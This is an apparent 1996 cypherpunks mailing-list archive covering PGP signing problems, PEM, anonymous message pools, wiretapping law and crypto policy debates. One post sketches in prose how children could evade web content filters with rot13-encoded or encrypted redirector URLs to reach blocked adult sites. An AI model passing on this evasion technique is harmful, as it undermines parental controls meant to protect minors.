>On my Mac I just entered this answer, cut it to the clipboard, launched
>PGP, clearsigned it, and pasted the result back into the Eudora window for
>the new mail.

But of course the signature doesn't check.  (I suspect Eudora line wrapping.)

>Pretty Good Privacy(tm) 2.6 - Public-key encryption for the masses.
>(c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 9 Jun 94
>Distributed by the Massachusetts Institute of Technology.  Uses RSAREF.
>Export of this software may be restricted by the U.S. government.
>Current time: 1996/07/03 21:04 GMT
>pgp PGPTmpClipboardFile.tmp
>
>File has signature.  Public key is required to check signature. .
>WARNING: Bad signature, doesn't match file contents!
>
>Bad signature from user "Bill Frantz <frantz@netcom.com>".
>Signature made 1996/07/03 17:48 GMT
>
>Plaintext filename: PGPTmpClipboardFile


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: youssefy@ucla.edu
Date: Thu, 4 Jul 1996 08:23:55 +0800
To: cypherpunks@toad.com
Subject: Re: AT&T bans anonymous messages
Message-ID: <2.2.32.19960703211803.006cedb4@pop.ben2.ucla.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 AM 6/24/96 -0500, you wrote:
>AT&T WorldNet service has banned the sending of anonymous email or
>posting anonymously.
>

Can someone please explain to me the technicalities of how they know I am
sending anonymous e-mail?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 4 Jul 1996 08:50:14 +0800
To: cypherpunks@toad.com
Subject: Re:  Setting a PGP keyserver on my Web server
Message-ID: <199607032119.OAA19946@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Joseph Seanor <cibir@netcom.com>
> How can I go about setting up a PGP keyserver on my Web Server?

I have simple code for a "proxy" key server on my web server.  It is not
a real key server, but just forwards requests to a real key server.  It
has a list of a few servers that it knows about and it tries the list
until one responds.  I use it for Java applets which get PGP keys from
the server; they have limitation that they can only connect back to the
server they came from.  So this solves that problem.

Code and a sample Java applet are available from: <URL:
http://www.portal.com/~hfinney/java/java.html >.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Thu, 4 Jul 1996 15:36:56 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Message pools _are_ in use today!
In-Reply-To: <199607022051.QAA10112@unix.asb.com>
Message-ID: <9607031927.AA00805@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


Deranged Mutant writes:
>  Uploading can be gotten around by using anonymous remailers
>  and mail-to-news gateways... although someone can tell if you
>  send mail to anonymous mailers.

Not if you run your own remailer!

andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jul 1996 09:04:13 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: The Net and Terrorism
Message-ID: <199607032148.OAA12397@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:45 PM 7/3/96 +0000, Deranged Mutant wrote:
>On  3 Jul 96 at 7:03, jim bell wrote:
>
>> If you listen to the Feds discussing this most recent militia story, when 
>> they're asked what was the militia's motivation, they don't want to talk 
>> about it, and won't even speculate on more than the most unspecific, vacuous 
>> terms.
>
>How can they? It's also not their concern WHY they (allegedly) 
>plotted to blow up buildings, only THAT they did so.
>Rob.

But as I've pointed out elsewhere, there's a big difference between "We're 
gonna do this!" and "Someday we may have to do this."    My impression is 
that the government has tried to completely erase the dividing line between 
these two concepts.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "CRYPTO" <crypto@nas.edu>
Date: Thu, 4 Jul 1996 07:09:10 +0800
To: crypto@nas.edu
Subject: A public briefing in NYC on the NRC cryptography policy...
Message-ID: <9606038364.AA836431090@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain


Subject:
A public briefing in NYC on the NRC cryptography policy report

  The NRC report entitled

  Cryptography's Role in Securing
  the Information Society
  
  was released on May 30, 1996.
  
  A public briefing on the report will be held in New York City:
  Wednesday, July 10, 1996, 10:00 am to noon.
  
  It will be presented at the Association of the Bar of the City of New York
  (ABCNY) under the aegis of its Committee on Science and Law.
  Mr. Kenneth Dam, study chair and Max Pam Professor of American and Foreign Law
   at the University
  of Chicago, Mr. Colin Crook, committee member and senior technology officer at
   Citicorp, and Dr.
  Herbert Lin, study director and senior staff officer of CSTB, will be present.

  The briefing will take place in the Stimson Room, 42 W. 44th Street, New York,
   New York, from 10:00
  a.m. to Noon.  Committee members will respond to questions from attendees, and
   a limited number of
  pre-publication copies of the report will be available at that time.  For
  further information, please
  contact Michael Schiffres of the ABCNY Committee on Science and Law at (718)
  248-5708 for further
  information.  The event is open to the press and the public.

     If you have suggestions about other places that the committee should
     offer a public briefing, please send e-mail to crypto@nas.edu.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 4 Jul 1996 09:16:18 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <2.2.32.19960703220436.00e93fe8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:07 PM 7/3/96 -0700, Bill Frantz wrote:
>At 12:15 PM 7/3/96 -0700, Bill Frantz wrote:
>>On my Mac I just entered this answer, cut it to the clipboard, launched
>>PGP, clearsigned it, and pasted the result back into the Eudora window for
>>the new mail.
>
>But of course the signature doesn't check.  (I suspect Eudora line wrapping.)

Yep.  Been there, done that.

Line wrap problems are the bain of PGP sigs.  This is the reason that most
PGP shells will force a line wrap before generating the signature.  The only
way around it is to turn off all line wrapping or have a utility do it for
you before signing it.

I am wondering why there is not a signing option that ignores all
non-printing characters.  Might fix some of these problems...  (Can anyone
think of a reason this would be a "Bad Thing(tm)"?)

---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Watt <watt@sware.com>
Date: Thu, 4 Jul 1996 08:05:39 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607031912.MAA08945@netcom8.netcom.com>
Message-ID: <9607031935.AA08888@mordred.sware.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PRIVACY-ENHANCED MESSAGE-----
Proc-Type: 4,MIC-CLEAR
Content-Domain: RFC822
Originator-Certificate:
 MIIBvzCCAWkCEFmOln6ip0w49CuyWr9vDVUwDQYJKoZIhvcNAQECBQAwWTELMAkG
 A1UEBhMCVVMxGDAWBgNVBAoTD1NlY3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2Vj
 dXJlV2FyZSBQQ0ExFzAVBgNVBAsTDkVuZ2luZWVyaW5nIENBMB4XDTk1MDUwODIw
 MjMzNVoXDTk3MDUwNzIwMjMzNVowcDELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1Nl
 Y3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2VjdXJlV2FyZSBQQ0ExFzAVBgNVBAsT
 DkVuZ2luZWVyaW5nIENBMRUwEwYDVQQDEwxDaGFybGVzIFdhdHQwWTAKBgRVCAEB
 AgICBANLADBIAkEM2ZSp7b6eqDqK5RbPFpd6DGSLjbpHOZU07pUcdgJXiduj9Ytf
 1rsmf/adaplQr+X5FeoIdT/bVSv2MUi3gY0eFwIDAQABMA0GCSqGSIb3DQEBAgUA
 A0EApEjzeBjiSnGImJXgeY1K8HWSufpJ2DpLBF7DYqqIVAX9H7gmfOJhfeGEYVjK
 aTxjgASxqHhzkx7PkOnL4JrN+Q==
MIC-Info: RSA-MD5,RSA,
 BeMb0/+U7Gnp8Xx2J5GUFwFI2hLb0giw65Y+HudXPvuSMDdeBToKOQXkR/HvyvKr
 kM+gtqWFV3Q/2xKS6iIeYRc=

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> At  7:38 AM 7/3/96 +0000, Brad Shantz wrote:
> >PGP is a pain for encrypting or signing e-mail when you have to save 
> >your message out to a temp file, encrypt it, and load it back in to 
> >your mail package.
> 
> On my Mac I just entered this answer, cut it to the clipboard, launched
> PGP, clearsigned it, and pasted the result back into the Eudora window for
> the new mail.
> 
> Bill
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6
> 
> iQB1AwUBMdqyT9QgMXPCzT+1AQF35QMAiUM/5pVLwh41m0KncAiW+kms0d/GWn2W
> C8RNwQpzanwEBaNyCpd/MSPdMAz5+YRrstnmp9MqGwbKMbsW4frqb86Dxdpgp2/f
> qnwHvik9PlU/K81unAPij83MulSuysdJ
> =feiY
> -----END PGP SIGNATURE-----

With our mailers, you simply hit the reply key.  Of course, it is PEM
rather than PGP.  But with automated key management PEM can be a lot easier 
to use than PGP with its key ring -- and most implementations don't require 
you to use the restrictive IETF certificiate hierarchy.  See 
www.secureware.com

Charlie Watt
SecureWare, Inc.



-----END PRIVACY-ENHANCED MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Thu, 4 Jul 1996 07:55:02 +0800
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: PGP, Inc. indeed has purchased ViaCrypt and Lemcom Systems
Message-ID: <Pine.SCO.3.93.960703153456.14182A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


C'punks:

In case you've not seen the press release, it's at
http://www.viacrypt.com/lit/pgpinc.htm

This brings "back home" the license that Phil granted for the commercial
sales of PGP.  While PGP, Inc., has a web page (www.pgp.com) it, uh,
doesn't really have anything on it.  I guess they're busy doing a make on
PGPfone, or designing a new box for ViaCrypt software.  :)

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Herb Lin" <hlin@nas.edu>
Date: Thu, 4 Jul 1996 07:42:53 +0800
To: cypherpunks@toad.com
Subject: SAFE forum -- remarks of Herb Lin
Message-ID: <9606038364.AA836434501@nas.edu>
MIME-Version: 1.0
Content-Type: text/plain



Folks -- I object to the characterization of my remarks about crime prevention
being made with sarcasm.  The complete remark was "Crime prevention ought
to be part of the FBI's mission, ... and it is -- ask them, and they acknowledge
 that."

No sarcasm was intended; the basic point was, and is, that encryption has costs
from
the perspective of the authorized information collection efforts of law
enforcement, and benefits
from the perspective of preventing information crimes such as the compromise of
proprietary
business information.

I am not on the cypherpunks list, so if you want me to respond, pls copy me at
hlin@nas.edu.

herb
===
Date: Tue, 2 Jul 1996 10:57:30 -0700 (PDT)
>From: Rich Graves <llurch@networking.stanford.edu>
To: cypherpunks@toad.com
Subject: Re: SAFE Forum

On Mon, 1 Jul 1996, Bill Frantz wrote:

> "Crime prevention ought to be part of the FBI's mission. [Herbert Lin,
> National Research Council]

In case it's not clear, this was said with much sarcasm... i.e., today's
FBI is too often engaged in other pursuits.. This in the context of
explaining that ubiquitous strong crypto is the best defense against
computer crime.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 4 Jul 1996 10:26:23 +0800
To: cypherpunks@toad.com
Subject: Computer-Aided Revolution
Message-ID: <199607032257.PAA16812@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


I've thought of an application for a "revolutionary" program for peaceful 
protest, but one that requires that a substantial number (1000) of people 
have access to computer time synchronized to 1 second, ideally 0.1 second.  
How good would a time sync over the  net typically be?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Thu, 4 Jul 1996 07:58:05 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607032012.QAA13633@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Wed Jul 03 16:09:34 1996
> At 09:42 PM 7/2/96 EDT, Derek Atkins <warlord@MIT.EDU> wrote:
> 
> :Basically, I refuse to type my passphrase over the net, which signing
> :all my messages (this one included) would require.
> :
> :-derek
> 
> Why, in heaven's name, would you have to "type your passphrase over the
>  net" to encypher a message?
> 

Lots of people still deal with the Internet remotely, despite the 
profileration of SLIP/PPP accounts.  To see the the difference consider the 
following two scenarios:

1. Alice connects to the Internet via a PPP account.  She downloads all of 
her mail to Exchange (on her local computer), from which she can 
encrypt/decrypt et cetera.  All encryption is done locally and securely.

2. Bob connects to the Internet via a "shell" account.  All processing is 
done by his ISP's unix machine.  He reads his mail on the mail reader 
provided by unix machine.  He has two choices:

2A. Install PGP on the ISP's unix machine and use it to encrypt/decrypt 
messages.  This is relatively easy, but also insecure.  The ISP's 
administration has access to his secret keyring, and his password must be 
sent over the modem line to the ISP before it used.  Thus he is "typing his 
passphrase over the net".

2B. He can download the mail to his local machine manually.  Manually 
encrypt/decrypt the mail there and then upload it (again manually) to the 
host computer to be sent.  This is secure, but it's also a pain in the 
butt.

David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2..6.2

iQEVAwUBMdrTf+SLhCBkWOspAQGLHgf+LEQRFzRl5vdWoGDI8TKhyfHHjBbCszHV
Fshtoa2h3vj+GcqGhh3IBTBwynZWlrQTHZeON41XMcl7ZxUqb9yd3C0qxaBE56Yk
Bf1b9KVa+z7GWue3EVbcuOP2wNBQjUKC0FZLjwHGxiLH1+sZ2HvTGzBSLeHWoMFq
oYyxLR6RZMbMy/2lKWJDIaz9CB4X8p5TPqvHQqoOIAhM6cmJkJc6VlPdW4bQgWWi
unzKcaMf9WuHH3crZMNAeGsnq2PkzYlDCTQNsESHIBtlw0+Z8gjmGaqnI2ouG1gh
b0ozEOOvgo+jrLF1+uXy92UJzdOFeNq4kXjbqxa9QQ7FidtDYpskkw==
=B5gF
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Thu, 4 Jul 1996 10:16:19 +0800
To: jimbell@pacifier.com
Subject: Re: Computer-Aided Revolution
Message-ID: <199607032325.QAA21478@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: jimbell@pacifier.com, cypherpunks@toad.com
Date: Wed Jul 03 18:24:47 1996
You could have all 1000 sync with the same time server.  There are plenty 
of standard time servers available on the net and timer daemons are 
available for most platforms.

Lou Zirko

> I've thought of an application for a "revolutionary" program for
>  peaceful 
> protest, but one that requires that a substantial number (1000) of
>  people 
> have access to computer time synchronized to 1 second, ideally 0.1
>  second.  
> How good would a time sync over the  net typically be?
> 
> Jim Bell
> jimbell@pacifier.com
> 
> 

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMdsBT8tPRTNbb5z9AQFtmQf/bSl4oZ/TGz9jzPcEk6pCrJISQrIkpwc4
3ycIuRTkAk71BxyWllpquaFvc4LYxSha1KgjF4WKLE8luVEhLYNiK+MZxUQmd6Sn
26eagt3r470dppK6w6Ahzf8Nrm6SwYO7J0xHAxh5j/dDkvtGm9S5s+c4cgzbyvzR
fOmz48UJYfcnQ5TmllOmqDHQ2YTbLcgBDZmG154KeSx/9AaU8hOw2WpWsCZAhVY5
By06kqTm12JBt1ERE63juPgf9AQpOY7ssGLRfTNttlZayd/UeTDmB0coD3rJnM1R
egbl7hdoqNmkic9SMHF7TS5p+pq4WphGkxUqmvyI9wBy2YC+Luqgnw==
=t8a2
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@gti.net>
Date: Thu, 4 Jul 1996 08:02:22 +0800
To: drosoff@arc.unm.edu (David Rosoff)
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <1.5.4.16.19960703170027.5fc7bc80@arc.unm.edu>
Message-ID: <199607032025.QAA25327@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be David Rosoff wrote:
: 
: I've wondered .. could a creative child circumvent these filter programs
: using a URL-redirecter, like where you see something like
: http://www.one.site.com/cgi-bin/rd?http://www.porno-site.com/
: or are they not URL-based?

I would assume that the filters look for regexp's in the query string, too.
How about a nice little Nutscape plugin that uses a rot13'd query string?

http://www.one.site.com/cgi-bin/sneaky-rd?uggc://jjj.cbeab-fvgr.pbz/

Hmmm, no bad words in the query string.  Of course the filter package would
start looking for rot13'd stuff in the next release.  So the next logical
step is to use the URL encrypted with the redirector's public key ... or
better yet, a dynamically generated key.  Just convert it to radix64 so
as to avoid ?'s &'s or ='s, and use that as the query string.  

The plug-in would only be necessary to generate the first request.  Any
URL preparation could be handled by passing the output of netcat through
a stream filter before sending it to the client.

Now, if I can get the time, maybe I will write a nice little redirector
to do this.  (hehehehehehe ... right ... get the time ... good one)

mark

- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMdrXDQ0HmAyu61cJAQEZXwP/bSI1tqQH/BCXXWPHhIp9Waq/A22ozyKf
W0iL3zveQWbmirXd5RYtxoo+v8jTFmv+SOIUKrI+n7WKTmFoj1TtzMf8zTYTz/KW
aZ2NK/PddgSqq4mjQEaxufMqvbG8lE/+Cu6GePo8UkFmkd7hSnNQA5sVv/kaTD47
5xVQCwkEwnc=
=traT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 4 Jul 1996 10:28:35 +0800
To: Ulf Moeller <um@c2.org>
Subject: Re: Info on alleged new German digital wiretapping law?
In-Reply-To: <m0ubYpS-00009UC@ulf.mali.sub.org>
Message-ID: <Pine.GUL.3.94.960703162440.5088H-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Ulf Moeller wrote:

> > > > http://fight-censorship.dementia.org/fight-censorship/dl?num=3027
> 
> > So what's the prospect for implementation? The claim is that law enforcement
> > is supposed to have a back door to every computer system. Are we talking
> > about escrow of root passwords, or what?
> 
> No. There are two points:
> 
> 1) The network operators have to create a wiretapping system to be
> approved by the Regulation Authority, and operate dedicated digital
> lines for law enforcement access.  As I understand it, Internet
> providers could be forced to duplicate IP packets to that line, when
> wiretapping has been ordered.

Sounds like US and Swedish law. What's the phase-in period?

> 2) They have to keep files of customer data (name, address, etc.) that
> the Regulation Authority can access secretly at any time.

Sounds like a market opportunity.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 4 Jul 1996 11:01:39 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: LE Risks with No Crypto
In-Reply-To: <2.2.32.19960703002028.00ba3b24@panix.com>
Message-ID: <Pine.3.89.9607031434.A15533-0100000@netcom>
MIME-Version: 1.0
Content-Type: text/plain



I will presume for the moment that you actually support this position and 
this is not a blatant troll.

On Tue, 2 Jul 1996, Duncan Frissell wrote:

> Did anyone notice the fun little bit in the story of the bust of the Viper
> Militia in Arizona?
> 
> The state employee that BATF sent to infiltrate the group almost "assumed
> room temperature" because an ally of the Militia working for AT&T pulled his
> long distance phone records.  The infiltrator was questioned rather closely
> about some of his phone calls to official numbers.  He managed to persuade
> them that he wasn't a Fed.
> 
> Too bad AT&T doesn't use an encrypted open books system to store is records
> so that "bad guys" can't abuse those records and put our heroic law
> enforcement personnel at risk.
> 
> This is a perfect illustration of the fact that technology puts the
> government most at risk because it will always be the juiciest target.
> "Worth the powder to blow it up with."
> 
> DCF
> 

I disagree completely with the premise that the government will always be 
the juciest target. If you read Tim May's treatise about terrorism, he 
makes a point that may never be openly discussed by the press as it makes 
all too much sense. That point is simply that terrorism begins to blossom 
against a government when  a section of the citizenry percieves that they 
have been disenfranchised by that government and view no opportunity for 
legal recourse to change the situation, and are not willing to live under 
those rules.

The fact that AT&T may or may not use encryption on their records is 
irrelevant. That BATF agent could have been the one to pull records 
illegally instead. Now where is your point ? A government represented has 
now abused position and priviledge to persue a purpose - right or wrong.

The US government is at risk because of the robber baron mentality of 
many of the government officials, congressmen, representatives, and of 
course BIll & Hillary. IMO They have purposefully abused position and 
priveldge and lined their own pockets to their advantage - leaving many of 
the citizenry wondering what is really going on. I am not a supporter of 
the militia movement - however, they do represent a growing segment of the 
population that feels disenfrachised and view violence against the visible 
government establishment as a way to make their point.

There are others who view the government the same way as the militia, but 
resort to trying to continue to work within the existing system to make 
the changes they feel are necessary. In this venue encryption is not only 
desirable but necessary as those in power are trying to consolidate their 
position by trying to use information they can glean against those who 
want to remove them from office or thwart their efforts to enact bad 
legislation. RIchard Nixon was noted for his use of the IRS against 
select folks. Now we have BIll Clinton and the 700+ personal files 
collect for use against "enemies" of the administration.

My position is that crypto should be available to all - not just the 
government or a priviledged few. Any technology man creates can be used 
for good or evil. That will never change.

...Paul





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 4 Jul 1996 10:55:32 +0800
To: Herb Lin <hlin@nas.edu>
Subject: Re: SAFE forum -- remarks of Herb Lin
In-Reply-To: <9606038364.AA836434501@nas.edu>
Message-ID: <Pine.GUL.3.94.960703165306.5088L-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Herb Lin wrote:

> Folks -- I object to the characterization of my remarks about crime prevention
> being made with sarcasm.  The complete remark was "Crime prevention ought
> to be part of the FBI's mission, ... and it is -- ask them, and they acknowledge
>  that."

OK, sorry, my reading.  I'd certainly hate to jeopardize any professional
relationships by implying that you'd been poking fun at them on purpose. 
There's already far too much distrust to go around. 

As I recall, the sequence went "Crime prevention ought to be part of the
FBI's mission [audience snickers, Herb realizes what he just said and
smiles]... and it is -- ask them, and they acknowledge that." 

The best standup comics are the genuine straight men, I guess. To avoid any
trouble, I'll be using that line *without* specific attribution from now on. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 4 Jul 1996 11:18:15 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
In-Reply-To: <199607032012.QAA13633@darius.cris.com>
Message-ID: <Pine.GUL.3.94.960703171006.5088M-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, David F. Ogren wrote:

> Lots of people still deal with the Internet remotely, despite the 
> profileration of SLIP/PPP accounts.

On the other extreme, but with the same conclusion, some of us work in
ubiquitous distributed computing environments. I simply don't have a "home"
PC; I can sit down and work on any of 20,000 computers on campus with equal
ease. Most of the time, I log on encrypted, but strong encryption is
unavailable for some services I need to use to do my job.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 4 Jul 1996 11:20:22 +0800
To: Charles Watt <watt@sware.com>
Subject: Re: Lack of PGP signatures
In-Reply-To: <9607031935.AA08888@mordred.sware.com>
Message-ID: <Pine.GUL.3.94.960703171630.5088N-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 3 Jul 1996, Charles Watt wrote:

> -----BEGIN PRIVACY-ENHANCED MESSAGE-----
> Proc-Type: 4,MIC-CLEAR
> Content-Domain: RFC822
> Originator-Certificate:
>  MIIBvzCCAWkCEFmOln6ip0w49CuyWr9vDVUwDQYJKoZIhvcNAQECBQAwWTELMAkG
>  A1UEBhMCVVMxGDAWBgNVBAoTD1NlY3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2Vj
>  dXJlV2FyZSBQQ0ExFzAVBgNVBAsTDkVuZ2luZWVyaW5nIENBMB4XDTk1MDUwODIw
>  MjMzNVoXDTk3MDUwNzIwMjMzNVowcDELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1Nl
>  Y3VyZVdhcmUgSW5jLjEXMBUGA1UECxMOU2VjdXJlV2FyZSBQQ0ExFzAVBgNVBAsT
>  DkVuZ2luZWVyaW5nIENBMRUwEwYDVQQDEwxDaGFybGVzIFdhdHQwWTAKBgRVCAEB
>  AgICBANLADBIAkEM2ZSp7b6eqDqK5RbPFpd6DGSLjbpHOZU07pUcdgJXiduj9Ytf
>  1rsmf/adaplQr+X5FeoIdT/bVSv2MUi3gY0eFwIDAQABMA0GCSqGSIb3DQEBAgUA
>  A0EApEjzeBjiSnGImJXgeY1K8HWSufpJ2DpLBF7DYqqIVAX9H7gmfOJhfeGEYVjK
>  aTxjgASxqHhzkx7PkOnL4JrN+Q==
> MIC-Info: RSA-MD5,RSA,
>  BeMb0/+U7Gnp8Xx2J5GUFwFI2hLb0giw65Y+HudXPvuSMDdeBToKOQXkR/HvyvKr
>  kM+gtqWFV3Q/2xKS6iIeYRc=
> 
> > -----BEGIN PGP SIGNED MESSAGE-----

And then there's the part about it being ugly as sin for people with
non-crypto-aware clients, and a performance hit for people with clients that
are crypto-aware. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jul 1996 05:00:50 +0800
To: cypherpunks@toad.com
Subject: Re: Message pools _are_ in use today!
Message-ID: <adffe823030210041114@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 AM 7/3/96, David Wagner wrote:

>Jim Bell brought up the really nifty point that someday soon we may be
>able to receive these message pools by satellite dish-- hurray for true
>broadcasting!  That would provide most excellent security (unless `they'
>started requiring licenses, waiting periods, ... to own a dish-- unlikely).
>I can't wait.

Yeah, and I should have mentioned the "PageSat" Usenet distribution model,
too. (It was a really hot topic 3-4 years ago, but I've heard little of it
in the past couple of years...the rise of the Web has made passive
downloads of Usenet a lot less interesting.)

Someone mentioned the Ku-band dishes that are used by PageSat (or whatever
it is now called....). My DSS system, which is technically a Ku-band
receiver, has a digital i/o connector of some sort on the back, and it is
rumored that this will someday be available for PageSat-like uses. (I have
a feeling this may be years off, for admin reasons if not technical
reasons.)

The point being that there are already _many_ ways to read NetNews almost
untraceably. With more to come.

(NetNews also used to be available on CD-ROM; the volume is now so high
that this just isn't practical anymore. But it underscores the point that
NetNews is so "distributed" that attempts to track who is reading
"alt.anonymous.messages," and _particular_ messages in such a group, are
nearly hopeless.)

Finally, the threat model has two angles to consider:

1. The authorities want to know all those who have read a particular
message--call it "ToAlice" to keep in the "Alice" and "Bob" framework.

2. The authorities already have identified a suspect, call him "Bob," and
wish to know if he reading (and perhaps decrypting) messages to "Alice."

As several of us have noted, #1 is tough--real tough. The authorities would
have to contact 10,000 or more ISPs who have local newsfeeds and subpoena
their logs of who read which newsgroups...assuming such logs are even kept
(I don't know the granularity of such logs, whether any logs are kept of
specific newsgroups and specific messages within newsgroups).

The authorities would have to also check on the other distribution
"vectors," including _subscriptions_ to NetNews newsgroups (where a
newsgroup is _mailed_ to recipients...I heard this is an option for some).
And PageSat, and so on.

The second angle, #2, is formally equivalent to wiretapping a target. Once
identified, and tapped, anything the target reads can presumably be read by
the authorities. (Quibbles: I really mean a "black bag" type of
surveillance, where the target's local machine has been
compromised/tapped.)

The bottom line is this: were I an FBI agent given the task of finding out
who is reading a specific message or series of messages, e.g., the
"ToAlice" encrypted messages posted in alt.anonymous.messages, I would tell
my bosses it is economically impractical.

--Tim May

(P.S. I think this recent discussion of message pools, started by Hal and
continued by this latest thread, is very important. Message pools have
fewer of the kinds of "correlations" that can allow sender-recipient
correlations to be made.)

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








